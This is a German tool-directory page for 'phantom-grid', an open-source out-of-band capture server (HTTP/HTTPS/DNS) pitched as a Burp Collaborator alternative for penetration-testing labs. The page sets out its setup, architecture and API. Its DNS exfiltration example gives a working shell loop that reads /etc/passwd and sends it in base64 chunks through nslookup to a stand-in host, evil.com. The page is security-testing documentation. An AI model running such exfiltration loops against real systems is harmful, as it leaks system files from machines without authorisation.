Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
phantom-grid — Kostenlose Burp-Collaborator-Alternative – OOB-Interaktionserfassung (HTTP/HTTPS/DNS) mit SQLite & Exfil-Reassemblierung | Kitploit
Tools/GitHubGitHub/evkir/phantom-grid
Payload-GenerierungSchwachstellenanalyseWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungWebsicherheitPenetrationstestsDienstprogramme & FrameworksRed TeamingDNS-Analyse
GitHub
112vor 1 MonatNoch nicht geprüft
evkir/phantom-grid

phantom-grid

Kostenlose Burp-Collaborator-Alternative – OOB-Interaktionserfassung (HTTP/HTTPS/DNS) mit SQLite & Exfil-Reassemblierung

Repository anzeigenWebseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Phantom Grid

⬡ Phantom Grid

Kostenlose, quelloffene Burp-Collaborator-Alternative für Penetration-Testing-Labs
Out-of-Band-(OOB-)Interaktionserfassung · HTTP/HTTPS · DNS · SQLite · Exfil-Reassemblierung


Was ist das?

Phantom Grid ist ein selbst gehostetes Tool zur Erfassung von OOB-(Out-of-Band-)Interaktionen — eine kostenlose Alternative zu Burp Collaborator zum Lösen von Penetration-Testing-Labs (PortSwigger Web Security Academy, HackTheBox, TryHackMe usw.).

v2.0-Funktionen

FunktionBeschreibung
HTTP- + HTTPS-ErfassungDual-Stack mit automatisch generierten selbstsignierten TLS-Zertifikaten
DNS-ErfassungIntegrierter DNS-Server auf Port 53
DNS-Exfil-ReassemblierungAutomatische Chunk-Reassemblierung aus mehrteiliger DNS-Exfiltration
SQLite-PersistenzAlle Daten überleben Server-Neustarts (WAL-Modus für Performance)
40+ Payload-VorlagenSSRF, XXE, SQLi OOB, CMDi, SSTI, DNS-Exfil — bereit zum Kopieren
Taktisches DashboardCommand-Center-UI mit Echtzeitüberwachung
Docker-ReadyDeployment mit einem Befehl
REST-APIVollständige API für Token-/Interaktions-/Exfil-Verwaltung

Schnellstart

Option 1: Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

Option 2: Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

Option 3: ngrok (für Labs ohne VPS)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

Architektur

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

HTTPS-Unterstützung

Moderne Apps blockieren häufig Mixed-Content-Anfragen (http:// von https://-Seiten). Phantom Grid v2.0 betreibt HTTPS parallel zu HTTP.

Automatisch generiertes selbstsigniertes Zertifikat

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

Benutzerdefiniertes Zertifikat (Let's Encrypt usw.)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

Mit ngrok (sofortiges öffentliches HTTPS)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

DNS-Exfiltrations-Reassemblierung

Phantom Grid reassembliert automatisch fragmentierte DNS-Exfiltrationsdaten. Dies ist entscheidend für die Extraktion großer Payloads, die über mehrere DNS-Lookups aufgeteilt werden müssen (Labels sind auf 63 Bytes begrenzt).

Unterstützte Formate

FormatBeispielAnwendungsfall
Einfachdata.TOKEN.domainEinzelwert-Exfil
Indiziert0.chunk1.TOKEN.domainAuto-Session, geordnete Chunks
Getaggtsess1.0.chunk1.TOKEN.domainBenannte Session mit Reihenfolge
Endsignalend.sess1.TOKEN.domainSession als abgeschlossen markieren

Beispiel: /etc/passwd per DNS exfiltrieren

Auf dem Ziel:

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

Reassemblierte Daten anzeigen:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

Antwort:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

SQLite-Persistenz

Alle Daten werden in phantom_grid.db unter Verwendung des SQLite-WAL-Modus für gleichzeitige Lese-/Schreibleistung gespeichert.

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

Daten überleben Server-Neustarts. Sichern Sie die Daten durch Kopieren von phantom_grid.db.


API-Referenz

Tokens

MethodeEndpunktBeschreibung
GET/api/tokensAlle Tokens mit Statistiken auflisten
POST/api/tokensToken erstellen {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>Token-Label/Notizen aktualisieren
DELETE/api/tokens/<id>Token + alle Daten löschen (CASCADE)

Interaktionen

MethodeEndpunktBeschreibung
GET/api/tokens/<id>/interactions?limit=&offset=Token-Interaktionen abrufen
DELETE/api/tokens/<id>/interactionsInteraktionen löschen
GET/api/log?limit=Globales Log (alle Tokens)
GET/api/poll?since=<ISO>Neue Interaktionen abfragen

DNS-Exfiltration

MethodeEndpunktBeschreibung
GET/api/tokens/<id>/exfilExfil-Sessions mit reassemblierten Daten abrufen

System

MethodeEndpunktBeschreibung
GET/api/statsGlobale Statistiken (Anzahlen, DB-Größe)
GET/healthHealth-Check

Erfassungs-Endpunkte

Tool herunterladen